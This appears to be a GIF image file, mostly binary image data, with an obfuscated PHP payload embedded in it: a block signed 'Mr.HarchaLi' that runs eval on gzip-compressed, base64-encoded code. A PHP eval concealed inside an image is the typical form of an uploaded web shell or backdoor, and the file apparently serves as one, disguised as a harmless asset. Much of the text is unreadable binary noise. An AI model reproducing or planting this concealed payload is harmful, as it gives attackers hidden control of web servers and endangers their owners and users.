h���G�,m���3��6-��E�L��I�³*K���q�`
DwV�QX���pe���� q��T�������u�
<�a�*At� lmE�
�
��N[P1�ۦ��$��@`��Dpy�
yXvCAy�B`�D� 0QwG#�
�[^�� $���Ǧ{�L��[��K�g�;�S~��GX.�goT.����������?1z����:�g�|�<o��!��{�e �{�v����c
�{��go�����'��zeh�rj�="�5��
�鲥���4���дV" w���$xva.�+��'�e��e�^������84`k�="">L�
��������0�]P�^p F<"��?!,�N4��P� �����:T�@h��%t��:�-��I<`��pI�.)^40D#p@�j4��:��1��r��F2oW�#Z�;$Q q�
� �K��Nl#
29!�F@�Bh�
ᏀL!�XF�LH�Kh�.�hE&J� G��<�WN!���ڈY�@
��>��19J"�2,/
&.GXB%�R�9B6�W]����W��I�$��ӌE8Y� ����A5��Q.a�B�&ة�J��! �t)K%t�-�JF
b�NMxL��)�R�Й����6�O!TH̄H� � !�
),=(�AXKgN
gYvY
xR"k\%wh
�h�h%�g+�s%�r.�x3�x �}9��&��+��,��7��%��(��.��5��&ǚ)ǘ;͕&ף*Ȳ)ׯ74�3��6�H֧KͻH�T��Y��q��h����pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N�����~��������������������������������������������g��
E$�����
�
����$E$�Õ��D� � �����̌��C���E
��H�M��G�D�
�B��ϾD��a����1r��Ӑ�� �o��zU!L�
C'�yW
�UGt����ll�0���uG�)A�s[��x�
�xO%��X2�
P�n�R/�њH�e+�Dm?#
��ǣ6�8�J���Di�M�ք�j����5o
Q7�-
<�
*�l�ӌ2r/a!l)d�A��
E���͆��
;֘c�%߂�و�b���pe~C"B���H�eF2��8qb�t_`ur�e�
w�
u3��Pv�h�"�`�Íx�LĹ��3�
�~ֺ������MDfJ�
��۵�W�%����X �)�@�ћE��w�u�Sxb8
y\mÖz���Zb�E��L��w!y(>��w�=� |��s�d
�C�W)H�cC$�L�7�r.�\{)@�`
@ �X�$PD�
`�aG:��O�72E
�amn]�"�c�xь� &dR8`g��iٟLR!�P
�d� 䡓���T���i�|�_
�Qi�#��g����noM�
�V
�)p����W��=�e�k��j����1߲s�x�W�j�l |0��B0�,\j۴�6���C
��W��|�ً���zĸV{�;��n��V�m�I��.��PN�
�����C��+��By�ѾHŸ����
7�Y�FTk�SaoaY$D� ����29R�kt��
�f���:��Sp�3�I��DZ��9���g��u�*3)O���[_hv
,���Et
��BH�
�[��64M@�S�M7d�l5-��U܍��zߌ3Ԁ3��
���P��5�g�
�ژkN�݅
0�j4��밓#{��3S�2�K�'ợl���2K{� {۶?�m�I�nE�='����^���_�=���#O���'���o..�Y�n��C�O��a��K��o,���b�����{�C�ڗ
"��{�K ��w���Ozdը�:$ �
���v�] A#� �����z)Rx����d``�w-�y�f�K!
�����|��P���=�`�(f���'Pa
��BJa%��f��%��}F����6>��G"��=�!o��^FP�ةQ��C���`(��\�ݮ
��$<��n@dĠE#��U�I�!� �#l���`k���'Rr��Z�NB�MF
�[�+��Ɉ-�wj���8�r
�
,V�h�"�|��=�G_�љE�0i*%̲��da0mV�k�)�;�&6p>�jK
���#
�D�:�c?:R Ӭf��I-̓��<�=���7�3���c2�W ,��8(T�P�F¡Jh�"�; </o��!��{�e></f���c��^f9�#��ragb�d�(0$k��
��'l�)b�]���e�></body></html>Original PHP code
GIF89a=(��'�7IAXKgN
gYvY
x\%wh
�h�t�h%�s%�x �}9�� ��&��%��(��.��5��D��&ǚ)ǟ5ǘ;ͣ*ȡ&ղ)ׯ7<ѻ4�3��H֧KͯT��Y��q��q��F����������������������������������������������������������������������������!�
�'�!�
NETSCAPE2.0���,����=(�����pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N���~������������������������������������������g���E�����������E�����B�����ȸ��D�����Ů���H��L��D٫D�B���D���T���H��G��A R�ڐ
|��
٭&��E8���kG�
A�px�a����
R2XB��E
8I���6X�:vT)��q�賥�仕F~%x� �
4#ZԉO|-4Bs��X:=
Q� ��l��yXJ�GȦ|s
h��K�3l7�B|�$'7Jީܪ����D�n=�P�
����`䌨lj���v>��5
�.69�ϸd�����nlv����f{���Pb�
�l5���p�
���
�3a�
�I�O
�����އ��Ƃ��i����#��)p�� ��{�)vm�%D~
6f�s}Ń �D�W�E�`�� ��L8x����{)
x`X/>�}m����Rؑ* |`D�=��_�^�5
!_�'a�Oڗ
7�c��`D�Cx`�
¥��Y��F����?������n@`�} lď���@4>�d
���v�xN
�י@�d��=�g�
s�G���
���ud &p8Q�)��lXD����A�H�ySun� j���k*D�LH�]
���C�J��Xb~ʪwSt�6K,��q��:9ت:���l�@�`��� �.۬�t��S�[:��=����N���{¿�A��R���6����0�_ �;������^���#���!�Ę�U���;0L1��p%
A��U̬ݵ��%霼��
���~` �G����
���=4�np�3���������u�u�ٮ|%2�I��r�#0��J``8�@S@5�
���^`8E�]�.�����7 ��ȉ�j���D� z���i������!��l��w�*�D�I�nEX��� &A�Go�Qf��F��;���J���F5��Q|�X��T��y�� �]��o���C =������PB@ D��(>�C�x�`��
��JЀ�۠��p+eE0`�`A
�/NE�؆�9�@��� H�7��%B�`�l*���8 2�%� ��:�1��E��ux%nP1�!��C)�P81l�ɸF#��{����B�0>��
�b����O�3Ȗ�()yRpb��E.Z�D8�
H@%
�x+%٘�c� ���f��b�d�`F�8�XH"��-
�|1�6iI, 2���$+](A*j�
QT�o�.�U슬�ㄎ`�SN�����y�e�������b��o� �)
�y�@��3 �tT̉�&�+�L�f"�-|
����>��v��\�Q1)�@��h#aP72����$���!�
�"�,����=(��7IAXG]KgN
gYvY
xR"k\%w]'}h�t�h%�g+�s%�r.�m3�x3�x �}9��&��+��7��%��(��.��D��&ǘ;͕&ײ)4��6�K��������������������������������������������������������������������������������������������@�pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N���~������������������������������������������g����E���
�������E
�´���C���Ƕ���D�ÕƷ�ʱH��M�GڬD�B���D��T����G��C�C� l&�:'�tU�6ɹ#��)�'�.6�&��Ȼ
K(8p0N�?!�2"ۈNIJX>R��O�M '��2�*��>#n��
�@�<[:�I�f����T�˘Cdb�ٓ[��E�5MBo��@�`@���tW-3 ���B���jI݅E�9[T�$��ﯧ���s��ȳ����dc�UUρ
#���ldj?��`\����u|3']�6 �S#���FKL�*N
E����$��e�YD��q�.�촁�s \-�jA
9�����-��M[�x(�s��x�|���p��
��k�T�DpE@W� ��]k�1�����Yb ���
l��*n0�癗�zBdОu�7ĉBl��-�x~|U�U�
�h�*H�� |��e"#"?vp�i�e6^��+q��m8 �#V���<F���C��^F9�#��RAGb�d�(0$k��
��'L�)B�]�e�>���
V��|���m"с�n|@�U��Ξ��pb�G�ED�����2F�I�?
>�x�
��
���%��j��ꄯ<�a�9ij�2�D��&��Z`��]w���:�6��B�7eFJ|�ҧ�,���FǮcS�ʶ+B�,�ޘ�N���>PAD�HD�枫�n��}�#˒�
Q��S���
2�X�{�k�lQ�2�����w�|2�
h���G�,m���3��6-��E�L��I�³*K���q�`
DwV�QX���pe���� q��T�������u��
<�a�*At� lmE�
�
��N[P1�ۦ��$��@`��Dpy�
yXvCAy�B`�D� 0QwG#�
�[^� $���Ǧ{�L��[��K�g�;�S~��GX.�goT.����������?1z����:�g�|�<O��!��{�E �{�V���C
�{��go���'��zEH�rJ�=�5��
�鲥���4��дV w���$xVA.�+��'�E��E�^������84`K�>L�
�������0�]P�^p F<"��?!,�N4��P� �����:T�@h��%t�:�-��I<`��p�I�.)^�40D#p@�j4��:��1��r��F2oW�#Z�;$Q q�
� �K��Nl#
29�!�F@�Bh�
ᏀL!�XF�LH�Kh�.�hE&J� G��<�WN!���ڈY�@
��>��19J"�2,/
&.GXB%�R�9B6�W]����W��I�$��ӌE8Y� ����A5��Q.a�B�&ة�J��! �t)K%t�-�JF
b�NMxL�)�R�Й����6�O!TH̄H� � ��!�
�)�,����=(��AXKgN
gYvY
xR"k\%wh
�h�h%�g+�s%�r.�x3�x �}9��&��+��,��7��%��(��.��5��&ǚ)ǘ;͕&ף*Ȳ)ׯ74�3��6�H֧KͻH�T��Y��q��h�������������������������������������������������������������������������pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N���~������������������������������������������g���
E$�����
�
����$E$�Õ��D� � �����̌��C����E
��H�M��G�D�
�B��ϾD��a��1r��Ӑ�� �o��zU!L�
C'�yW
�UGt����ll�0���uG�)A�s[��x�
�xO%��X2�
P�n�R/�њH�e+�Dm?#
��ǣ6�8�J���Di�M�ք�j����5o
Q7�-
<�
*�l�ӌ2r/a!l)d��A��
E���͆��
;֘c��%߂�و�b���pe~C"B���H�eF2��8qb�t_`ur�e�
w�
u3��Pv�h�"�`�Íx�LĹ��3�
�~ֺ������MDfJ�
��۵�W�%����X �)�@�ћE��w�u�Sxb8
y\mÖz���Zb�E��L��w!y(>��w�=� |��s�d
�C�W)H�cC$�L��7�r.�\{)@�`
@ �X�$PD��
`�aG:��O�72E
�amn]�"�c�xь� &dR8`g��iٟLR!�P
�d� 䡓���T���i�|�_
��Qi�#��g����noM�
�V
�)p����W��=�e�k��j����1߲s�x�W�j�l |0��B0�,�\j۴�6���C
��W��|�ً���zĸV�{�;��n��V�m�I��.��PN�
�����C��+��By�ѾHŸ����
7�Y�FTk�SaoaY$D� ����29R�kt���
�f����:��Sp�3�I��DZ���9��g��u�*3)O���[_hv
,���Et
��BH�
�[��64M@�S�M7d�l5-��U܍��zߌ3Ԁ3��
����P�5�g�
�ژkN�݅
0�j4��밓#{��3S�2�K�'ợl���2K{� {۶?�m�I�nE�='���^���_�=���#O���'���o..�Y�n��C�O��a��K�o,���b�����{�C�ڗ
"��{�K ��w���Ozdը�:$ �
��v�] A#� �����z)Rx����d``�w-�y�f�K!
��|��P���=�`�(f���'Pa
��BJa%��f��%��}F����6>��G"��=�!o��^FP�ةQ��C��`(��\�ݮ
��$<��n@dĠE#��U�I�!� �#l���`k���'Rr��Z�NB�MF
�[�+��Ɉ-�wj���8�r
�
,V�h�"�|��=�G_�љE��0i*%̲��da0mV�k�)�;�&6p>�jK
���#
�D�:�c?:R Ӭf��I-̓��<�=���7�3���c2�W ,��8(T�P�F¡Jh�"���;<?php /* <<Mr.HarchaLi>> Q@Live.Ma*/
eval("?>".gzuncompress(base64_decode("eJzlvX1XGzcTOPo3PaffQWz9dO3GGNskbWowgRBISBNIeUnShPzctb22t6y97u4aQ1I+6++r3JnRy0r7Ykzy9LnnnktOwJZGo9FIGo1GoxFj8mfryXQ0Zd9/9/13rDR3u6zNSp3T/ZO3+ycfrRdnZ286L45Pz6xPm5jvTf4y8k/2fz/fPz3rnJ8cCohu0L8BEGt/eNM5nXp9N2QXk/PIDY+csdtiVm0Uj/1o6vY8x++NnDAql2KnNxj2P9qzCYDYnyqsZl1M3jhR9C4I+63vv1tUZjoHGCiDRV67UeQM3dbFxMKv+2tQ65Ub5lX6/Xdl1Qhba4TAJIs288qypKjF/3aOdl/vW7zoxeTwTQu4aSE3xo7nl635dMf3rtzaILSq1unI9X02iuNpa30d+Y08tarMIs5ZFSj2A3sH3cABuzesGwwG339XcmbxqDMFriB3EXupF/hBiN9+6A8eUUrfHTgzP+44vdgLJpBlH3i+G712JraePYvcjvOXcw0AcThz9SxqoRtj0XfepB/Mo7VG81EDi3//nTcor7rjaXyjMY9GyDl86+w+3z86AwZW2BdoOvyUoJ5wd+hOYqTZCUPnpmw9D4Kh72KDT/1ZOMUPr0+PngYxfvKcjhP2RsCsEL/+4Uz67jV+OnHGXR8SkT2IGiiZhu6wM3bi3qhsr9usxrzx1A/6btn+x67qdcN4Yva6h4nLUI0/I9eBgVsmsPVGrc4e1h+yoyBmB8Fs0rclFfjjXnux+Hr7/Xe3yKadCAYi8L8TxU4YlxF6x5t4HeBr2XbDMAg7fjC0q0fnr16ZmZDcIYDIrtbNrLFz3XGv3d4Me7YTezBTBAhk0/eO7429uJwkjp2h1+v8PQtiN+qEswkCiWzobm8CrHp6fHDQAY6cHh4fAYNsaCu1jvp6mMYxnPbKnFErg9mEjzHEEMWhN418Jxq5MDWpoznUSujGs3DCvKjDu19mPuHDAdBPORE6CuwpAddiebiBwBXg9Eqp8wZEE4ytLBGUg4DUIwa1r4KhNylzAvueW7a2YCgxx/eGk3YPBowbbm91t3dhugWh99nBclvrXUgLt/9vfTBgF+sX6xv/l5X+Wftno9FgwDLM2hoE4ZiNXSjVb0+DKN5GCYbSqcW2vMl0FrP4Zuq2pyKVobCjb9t6djTrQieyK8efuW17e9ve3lpHzPAHqNy2VJNwLnoRDg0c1afYgR/H/UfpmYmyG0Y3jG9oLZRhYv4qaVJh//zDykyiQraBVIUMFMQ//sjKHKmZ3oY1QMMA/7CzlyIkkTkrrh+5WE7rFDn0oDNjkG5zmITAEfhWfvPiTef4tFqvblSofmvuTSysthSgdLHhKwopgVMkTrxrLrlKkTNwO2MQD5BMk2qIk0ql0qBHliaAFT6p+XwN3WkQxt5kyOcPCkwvckAkdeTQigzEmVyqoDQKYJr25n2EBTj4VBYVm/zv2bzDdnqjvhcayST48zBQkwUj+ODWqwMWYiN8pwcD/uICZeo6/FIgNKdKi2EF2C1VR18/AqjvTsqUtdb4xFaBABDGFYmsRt837z9gUWbjEsUZQavJvUpBM8rdIPArpeevjp/uvjr9aKdXPxsVlpUs75B2kAYOSHG1bOEwtV55UcyeeaHbi4PwxmLtbWZB91hVTuCKdQArJvNwzaqhSuVNWG8WhiBSGIJJeLYesfU5W+8moCkUP/WCycAb/rQcFh06QXQ6CuYM9YArlwHAxOXjkJefuDGsTTFbcyapErBMTGCYM9R/vJ6bwDNazAT0ioUaHaDvwXoYa0C46qYw9oIxSDc31KCuPHeOUMDT3ZM37AynCs91wikQJfIO37A9atosJCnMQbwpby9bd3zfAsCKNu2z/QZ0iJ5T3PMjtuaPZC0+5g1ATWJODEtIF2iNGCwVDnvlTWbXwAmorw/rfOxCd/U5aHQTxe5YosOCbO3K4S0HnBE2PJi6E4BHwZFlO/uHDWGOsTWPIQGu6gf8saZhALyPkOfxTBSeRsyZXQuicZjwZFXnAEcOsIRFM49TKQpSxjpbw/WFDdja1IWFaq3+sF6vAx8iE0FSOHfgEUxtSVxEzHApYpr5xAy/hph8XHzQ1LxJj2bVApJwYU6B56H66U4cF5aAvLAWIFiqaYvxIaPnoRfjPGKDwAfdFQbLJJfxnEnN/N4qRrKQyoU4hSSpTecLBwK1UINNjYQ0kuW5VogTiYPNHSlkd5OmIE0kKQTLk1WAj4jqghLbGYFYgGXmbsJ06BRxWUT3ILAYLxE5AO1jhBvcsHc3jRpwisQMmntQmMKKgj7oObGbkow+JdKeu1/DKaTTm8mUywJPvxqBKh8VldJyzWIgwAcLatOzUwWjmy7InKJySa5ZbHxTVETkmOBOf+xNTDmYyTJL9AbDtNw0c1LgUGURvMjKFgB523figiI8M7dQcT1eAWlcshcXgsyiQoQwv0hxq7jmuZhQDSgPiVwtcoqa4PpASLrVpmQ7BZqSyQoW0tOg0d9+Liikp0HzZKqCl5npQkUyTxXUAdKFxzdAxsLSBkS6eIEoU4W1/FTRrtO7nOV1Ks8wgfuzcR4oJqelh3eVKzW8K2tFaLwpo8YLbrHiGz/Y0Ugzndg4cque2FWuZJLRppvZJ6lc3CYN/aDr+IzbHGnz3hsFzNpC4+j2FtrLtrfGbuyQIF1z/555V20btHfQbOO1M5DaNg5W/Na2Y9Cl17HgJhN1tC0Q7lmqasyyt7diL/bdbQ6Rs+lDKLZGTGAIpJu0WM3aWuflv/9uK4pv6AMaWr9gBw1DNOetUZtaP4DaWG8+3hTf3Ab+27zl4NW4X41HX1g3CIHNrcb0mgWzGA2lXdgmX24OoG0t9us0Zq9mPa/vVN+6Yd+ZOJtjJxx6k1Z988oNY6/n+GtkaGrFwTRVE5oPSfkCUTIIZFVrvjuIW4+gvijwQRtGU68sOBgMNgubgeiiqTOpjhpV5wvjmVScrXpj3JQ4k1hBfWHYgrW56w1H0JAuqX+UO2qYpPxikjJ1+n3YL7ZYE9KBTMGJxkNgheRBIY2SOVAMq+p7VzUxSL4whRgqFICKgByMGxsbhAOaisNrrQ+7Nr5rbE2CicvzWqMAuiELAXjc0PcEWG3sN4yeFs19+PChau4jRRR0LSId+MG8BRu0OOA4ut7QCV2gZu7141GrUa//Z3PEudt8JBtMdr8qUoOw1cj1YZf+hSnEC/v50aNHm1kisU9YMhpfB5MA+rfnVmEyzkIPNu1H7tym2tGsmFQmSPohDgI/Ouv6gkt8tHKzKG8ZARxOprJpbKMOhTnjHNDdYJpoJbHLcgfABhTbTAqFom9Ei5rJBBvCPn4zr/0u/kMM0F3ZbOgtymvm5MFggbxp6H6hUT9wxp5/0xIMqiqeIXlb61JqbEW90JvG23ybfuWErNdBGyPKnOz5lJKmvXmfG6YsezMp6hQX3ZFy0OFHYbZWIZeMS5RNBD5i0CqeNlTpMlpZp4FWatqwP1Wti4lVWW23B44fuZUntt3Ktk6H3z866/x+fny2f1rJVNZcVFnznpU176hsY1FlG/esbGNxZWgm7Qe92RgmxqZ+HIL2Tafaq04b1WmzOt2oip4Q5yGwMjur7cnM9yv92nhQc2rc0u9sogWLmWmdTVGkpxfpieyeVkSlqSLThl5m2hAA04ZWSktNyjWNck0J0dTLJalJuQ2j3IaE2NDLJalJ0zh7jAbyJNkk/k1vbF5+R54JqZ4YLuqHwm4iuqgafhJTrmQQO1+PmMapEzpjOp1AI3QbD0NsygR5XPba9U1vi+qHxQBHV1Tz3ckwHm16Dx6Q8rYiEDwADD/aDwzYj96nGm6NH9ht+4E76QV99/zkcC+A9X4C+eUMMPGQ0xaFZZo8sMIlp2j5R+Q4GaqiIVn+AKJZ6Kt89mWF9zUrz+lEufb+9asXoCWegJboRjFvVOj+DSyZuHNm5nL+01ER01DskmH7/XH3L1gx0xiMzLL92uuFQQQbbqoYFEfj/BaRQlHj+Bd/IK0WTGBZ7t+gFRbUXWcyxNMjYZsF+vYoaTOn3NSdlG2UJMAm4gX2ciUHEkaGaChX4FnZVJqrMEqmUx8UR2Tt+vXafD5fw4V7bYYHL9jB5nF0gnjSLyc9JLNu052Vbk05EVTElxpx4BQ5gCckD8VRH+ZTNWSgxpxmvS6K8mEeukPRHSfucP96Wr6wyhfw039QKX/ED6f4K/r0UwUPmOyxzTuaF3bCsA0IanjgLaiIYAhH7hloFhLQhcFbBsiPzU81cUhYr2LRjw3Y53CgW0Yjx/FB+y7bgtX8TG/VlkMX1ni5tIudDKr821ugjzJa/ds2LCYeqYpOFxStWexuanpdrvKxCRo+qHCkstY3bcSdPiHmR8Djgayk70VT37nhCiuV0A6GR16/7054EWdBXm9B3rSxKLO5KHNjUZVcxCEEP6u26DBxELruKepReFYJbbvEBFKsMuoRwcdB7PhGgQ4ldZYto317on1uNQg0BLnnRIR7Opp2yNmobId8FJQu3XDi+qnMSGS61zAFJ5cos4XjDqYEHmwiurBjGa/jEQ4abp70XT6UYKi0Sarzs2zURWw6TkLfBl5XhYEqwrguQptyWUutzdTkFqXYb5w8dHMRQ122p1qv/sxHuzxOz0ckW1gDJPloNjgaPKeV4qHjXkPLgHYc/9d4tO0OPRA4YqaTk404ie4Imy0er4ZCapfwMIlnj2/gs0weaslDLRnm0BT9mZ7QABJz94uOSdExnSO+hCzCbqJXmcNwaMAONVjRAsT/0eb+ZzrpPB1+yWRJI1ZiFuC18vShLECuGnQU3sEuoWWfxkVp6sQj+EYDCbqHn7DnDfFJmw5Zy1SCklBRKKGmwEreVmmy1sAPoB0IViWVwQCwthw2Ct1B2/7BZsGkB0vJZdsegjSWnmEgfi/In4xrIKW/CPFfW+2Sh3+l1mGiJWI+lv76VOPH+5lqL6yKvW3VBBxoGtb61rrDJYNkChcbyWGtfX52sPYY1zzD9Qy+/3Z8+HjtRH06x0+96eOffxYTNJgqc1XCYmiN6/RG5aQiJwJGxe6YzzejEDoqbAU0cYXzjWXXCLgGWpFdy5rS2m3KfmLzbTuswy3brtTsbVVua50j3OYOECulcdLUU7dXY4eTQWC3t/ELfaxydz1MUn57uHGfwJrjYqr8WLVP//apJPyp2m9GU/yCfyDHGbiMfFowH768xs+QHod4sE/bd8qi72f0tWo/DWFRA471qJj2rWofufE8CC8xXX5UgkKYGdW4VU5BytQ4/mi/Coawlycro/xMvQZZp64/AFVhDHt/no8JJ/w7h3Ens2yPjqkrL9E4WroS9SAg9SLMK1qcsQfL3iSulGGVXheTaFyBLvqPtf2RyYlh/WCpiWHBxLCh/65q9oVdxS1J9QI/qV8VC7v3EvvW2Wafttbjkerdfghap/LORPYkfAkibJ7hnaNaE5LeZfeA1Z8hD1tGqCpCD/OiDjkBUWLNbl0AGWJOiiqp2UXNUfMcWwDESzTr1JqPLEnC9kCrbKnRk4kX+Eknwj3YE0RtNE2ynuv7whDW3qBvuELjt7rgPKpF21txCP/7Mml7Cw2N2+coM1voMYcuJPQBxi39fdHv09+9eb+FS1QR/57YCPWM2t6iWYerGmhxiB+6pL9tK40XMyBhaxJAEW3d05b5SpWB3tho1glNMi4QOllL0bIQOyGsH+1O13cml9sfTSWAmLe1ThVticpoFUGkZca/4mqD3yuMc+M5LictQTqHGZpF+IJDZSRWpP3KDdHFtCxopvJq5hsINS4m7m6fgIdo++J2YdC1+9vHR6i9TeJt4Kie90O93u3W6+gTeXxwQJ6QAq6ic1nx7Qdz+EHnpqYSjiEx9qAhNKL4wOOteAZbDfRUNRrRh8Sy/cfaeK3PXrS8ViT6XHAEbf5vPXd+6n0GTSdR/XTuHID2aeA0CyltlZcp28A5FB5My1rXUP/UqPMB8x/VL/oSiFoWr+KNG46jPWRlnlWwkG/mtEXsqrD02aOzD0M8SRn1kSEMZ6uiTgoLnCo5c0TOU+EJG6KtWsybLb7EIYG0SUQKqUfzfsUjLxJ2BWsbl1Q+gn2n6/pt640Dm2ixhlqcLnMdZnzZpEIw0njN1AgxyMkxnx2+kX2pZkXGK3/32bMT65McJ7z4nu+hY0G2uG7reH18tk+lOYflpEauwS/6hDIxzUKSk3wvZ4kjE9wENhPrPJ5SWPeRn0QZX9qo25K6td2pJWz4jyxai7IezwdBEKvDwRKsJ8rPp820b5nx+cRiuiSwf2g+GgzqdXu7/A6KuFimIoSB1TJhUaKU0WNeIleAwhrBzw9xywgNwa1jZpnx+m15GLEky5jcSRdzX+R0gzgOxulM3HOvINtxdaVlg7bsoHSRLRD15mSIC5srKM+g624KR3fazgEeMdi4zQhWb320iW00b6ktj1Nsvq/GoxOxq5ZO4EseMOBR6XKO5NCwggZewMTmkkfohUlzB9JWaLT0whJNPXEdft7/FS0d3I9wPg2KeylpBOnP1AR7fAm9YPOm9Bc35bVzafSZPmHu0ar+/6I7sGHIdXthY/R++crW/Bt9pHYzmUlV1Jp9ugDzNWNMzaavnyXCcoe2kNhm+0d7Z3+82W/b45kfe1MnjKngGmgqjs1LFlnvZHV8jO5OFoMbciA17WnWLyo8bcjSM9BVnT5WeUd14gKYVmn6coI6W3ySSRLKuKSKa/xU89cPQnK4vtcg7IaMpYaiXDVptQEllgy85IRCK5K4UsOypi/LNDlZ/FKMsOlpTjOZCx+fqsw2y9qVtjx8VMcNiSHetGyVpgBiTIJb8hhYTCJZur6SRCq7HIncoFZAYkr32L8ul7yJUD1g668289iUjJ0RDf7KvLhD5n8oXcWCwmDHUez8FXiTMh7oJnncXpiLFi0S8SicKdRBV7ucBzVJAKJVrwgAybjpu86kfFc1/FZAYSU8+xurwFuhHYNNAk2So2pI8MB8C90omIVoSB9w6ygeUiFzrdCqpHAJe+B8BFOvvLozcIMBFJNWB4SptdkAj4YgudqoNx/yFk17fhBhDepUUIwPLMOnmTE4ku1XpDzXShHbbrNG/ZeNXx42HgPm75N7hNE0hD3ZoGz/p1FrDtCWHrF1DZZVcEf1/Kkt7eEavoePH/3y8zLICJDxzdnrXFTLEYXkEJLfEiRasRLfJT7NV9lp18inmJgr8IX9yOrXe3XceLbb8mPJwykVaXQmsLsJ7G4C6+fCPk5gHyewa7mwPyewPyew3VzYhwnswwS2nwvbTGCbCWwvF7aRwDYS2KmCZTxhxu2IHo5YVbZOm/cnzA5t1sJGVvKA6o850Hwh0EMCShIeC9QRlbpGW08rJ/tUIs3H2lyGvsYy9NUfm/Q9XEzfw+Xoqz9cgr56cxn6GiZ9TUFAnE+fzD4z6JNzyiueTMIEM0hm1OoOiUWnzze/Qr4JVKYN7OAAXRaVrYnPzh3UTKZ8og4qwgjJTWP6gKVqkj32gmpA3sbu/SsppJpv1++FUN0tzigZUc+Z4H2M9AVwkV4uwS+5ivRHDBc2WGFUTrKgwKqG2gIdfwIJkEK3OdoMu4LDjyry1icgI0foj+SjLIE3dTlK+WK9yfb9u5GHJwZCkMpjN6GZ2HPM5YbWafpQg87b9L6iFG20caUnXSmPvSCOdITNRffQ3kws66OGNGdFsK+BEXLD0PIRjsWlc8gnMw/Xi4VrLO93o41Q2Rt09SiXJlU8EBG9cEV3rT1IvuLsxyVM5koaSB8nBkxwKLSYUNH5qZ52fl26qjLyoAOZq59bC0xQmzTI8pJyZKqa8JY9b8nYb/AqeRm62c5LSf8UwTPVMFvyKRjEcydExxg8PnYnV5DFrX2nxwdn73ZP9rlE4K49Wf3JmTq9kUsK1zjoz/C0rZLYsU1u2q9g3+L22S6VYRK+mkSaAP25yrIoyxUulUxsz7j+3WdvXrxhB0oJ1499c1T0JwtzWzY6i9g5tR3D5GNddHggw4d2Nx2nZQdzMCOPUHWOwFCbzJRXpwikbHbuxuJNev6snyUkQSQgCnH1zk9esWg2Rbd1QJHpVZg8fkccidiVJzYICeS0jewRyw5o3tM2P3yVEz2Dhl8S4co4mok7OBvFYRshIClkvb45/dtnZauWC1+u1KyKVVhFhEXEhewc1Kenv78qLDwdFpd8E0SwL3MXFQ96XnH549CBHYiV04+c7TBu0bSB4yY7BQhPRRdtUg4UHoRiaAYhisz6TsSCzNbduLcuLgvhsNHWalvPqzyxbtyILXZ0IAMaeppdWFSWf+QYyFfhI15KpwMTKxk1C0mLRk4/mOeTJvLuSxoU5R94+aUJOz5lcvQDObgg8lHJVwzo+nX081tXMyQPB4inOCQ7SxEObJgXRTO3NnFjiYSCZuSdMGY8Kun0czDzEyeIYQ8PvX36zT9CT9tj5xLdDqbkzQCKCno4TG/iETbODmfdG/gD22r4PfzsIUw3+dOEvxPCRFem4ANeaCckaS/JUh+N82FCzaVzhaWD/gZi6fZ7QegiPbMrVHEQFQH0w7nbxXRYy8b4N7wczfB6BCaNLsMgiC89kFK2NyWNL6KPgzlSHXrTuRcSWSPP9fvUaAoQACwOsWHRhEQczBNQCbAdXj9y+mMs3MMZN0SYa69PTRzCutO75B/nGAkJM2+isRNh4udxFwifEuHzsecjH+egXIjWTLzJX04OV4L5BO11ePtbsWYOIwGK0D04rO5mck20TS6xdSh9sTcIxp9P18YeOlhKj86URFjJymLlCwH6oBwkhq8ODTNNm6OMikm5aoGSaQTG8ZtD/ZzXkRZjmhS7g0gxdP5NGp9RFd9AotaPik72bxCaVLSQWjUM1rft1KAzEb549oyRyyfgkHp6f8DWRlLkpAh4gXewF8ksuqQtC99+b3oWZgTpWylIZd0gNfMl5i4Pf8JO3RhDA0VJEQxyIoOj5Jel+Cm7EsQoiDNAFNK8cMhwbcvlWZ7oFuw+3oymyVVQ03ovg+qIPcJ9g+rI2E1p4yY5Y+v3goSJE0cAqhfyskwN+mefX0B4enPYL6N/yPEsns5gQanR6W1NuEG3bXtzqVIeaDThi7PXr9ry/kJPXmDIHJuattYK7Wguwov44sK+qFvimhZscnibkPMywhENZb4DEvoOh8Hwb0x0VXqbl2E+3mHi1nk9hfQhoWrybkn2h7hXwKyizaC41Fqbsi/J3crNW3ltzc7rK+F1I91uY+qhjBU6EQGUT+H2ZFQoe7WMJyj/OK2L+YN/6IIsi/vwf1Rlowb8b0JDaj/dro4j7xwWBRQF46lRXwofL82+lGs/VVSxmltlNdh21kb4n/JLjVsdmeyiBBMwDUpujZqklgIcq4nJo1ag2+9zrkiLeYGds2rm0GheOsCZMVukhUA5PFCf7sswfrgTXEPv7MLepYNHfpI3MK4OqJNUC1pCR6dYaY0UArdf+eKYrlf8cBVqkuertygBvwwXQnFvos1bw9xhbW/JC6viwBC3eJxscekVPTcA6x5kbNu1ch47nyy8U1jhnrRb67Km4nO/ffhjusGQ18ej6bUlDGTEdiMEHzGpG1yL41gMhMmRNbij792dXBNd/MQWDJe+vwzv3YAER0/b3Ze77+WJJNo+OFe42JIkQ3153EldBeHIzeahH1FiTEmZroyRm3sYVSCviVt3Sc30yoTmm/utT9I7407zGAKysTNxQBcqFoH89s600cEbiXi7sG1Zm+pWzxLMieYexhE1soSZrIcmFP30vKV0qNUd9FPu8Dy330H9A3AcHL7ah63QwP700QYB1OGXBDD6qJ4jYt0K1VGEU9gDzRwUgOTAfJWvRCsrXZgFl5saRdyhxSDmUo8VSEtNHvYeYIpdupmF5twi/H3Xd2PVWtV/PPkZVkT2UXnlS1lWZbxG+l5da1TabXvdRpM9pbTot7o1sJI1FqtrDvgjDMaMa6kpGzHTr9AoQlYkKK9J01tX+C1EVkYjBrn+Cq0Yw0nWahYPhZmbacl7b/iDA8+bCD2IaqSwRG3qMfwoihq1Cpg2DxmYINMYahZK7KfwszOb4G4rBXMr/tKpq+SKzNwJxxl+3qrhoiKyqivSA228KEf7JI82EYPMpl7/QUPPgJSZWs0u2FDInywP8VQaNpIYlqGvjpBXEnKpMYNKLucGd7FtkOZZZrxPnSjWJ3eyDNggs4SS1gumN3Yy1NSswPQOYSiXetVSVC3BEpxDfq9WiipJzoqYsn1MVi1YKeE82lETomfmiikhjvHVfBhV0hfKkrGHsKtiGGNEN/UdEjTQFaMZUCtO02ppAKKrL74ldEjfAmwbF3y8cQnvERtPFQgy4zYZZorXyUiTiHSiErgeSFSiLH1lisqI0S5JzO1LumOS05ck0/9/2pc7/3ZnQhu5b